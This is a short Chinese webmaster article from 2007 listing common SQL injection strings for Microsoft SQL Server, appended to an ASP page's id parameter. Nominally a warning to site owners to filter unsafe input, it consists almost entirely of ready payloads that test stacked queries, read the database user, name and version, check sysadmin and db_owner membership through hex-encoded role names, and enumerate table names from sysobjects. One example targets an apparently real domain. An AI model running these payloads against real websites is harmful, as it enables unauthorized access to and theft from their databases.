站长注意SQL 注入一些常用语句
作者:aivii 来源:csdn 时间:2007-10-24 23:23:00
内容摘要:本文列出了SQL 注入一些常用语句,站长朋友请注意了,看看您的网站程序是否存在这样的漏洞,一般过滤post或get过滤的不安全字符就可以了。
是否支持多句查询
http://www.xxx.com/shownews.asp?id=51 declare @a int--
是否支持子查询
http://www.xxx.com/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0
返回用户名
http://www.xxx.com/shownews.asp?id=51 And user%2Bchar(124)=0
当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
PS:0x730079007300610064006D0069006E00 = sysadmin
当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1
0x640062005F006F0077006E0065007200 = db_owner
返回数据库名
http://www.xxx.com/shownews.asp?id=51 And db_name()%2Bchar(124)=0
操作系统和SQLserver版本
http://www.99568.com/shownews.asp?id=51 And @@version = 1
本地服务器名称
http://www.99568.com/shownews.asp?id=51 And @@SERVERNAME = 1
http://www.xxx.com.cn/Content.asp?NewsID=1077 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名
0
投稿猜你喜欢
Linux服务器选择什么版本好
李彦宏:五年后为什么不再有互联网公司
用微软的压力测试工具进行拒绝服务攻击
Google adsense单价降低的原因:无效点击过多
VMWARE安装与VMWARE下LINUX系统安装(图文教程)
VMware12安装Ubuntu19.04桌面版(安装教程)
Godaddy VDS Simple Control Panel出错的解决方法
搜索引擎优化的第三个层面
国外网络赚钱之支票 美元外汇等基础知识介绍
网站被搜索封杀或者降低排名几个解决办法
Windows 10 太难用如何定制你的 Ubuntu方法详解
什么是SPAM?搜索引擎优化中的SPAM
巫妖王不治!《热血2》死地后生
apache禁止搜索引擎收录、网络爬虫采集的配置方法
Adsense邮局西联收款全过程
搜索不更新网站怎么办?
21岁虚岁男孩靠一个网站,月收入5000元
教你一分钟搞定docker+redis哨兵模式
龙源期刊网兑现承诺 提前免费开放20万杂志
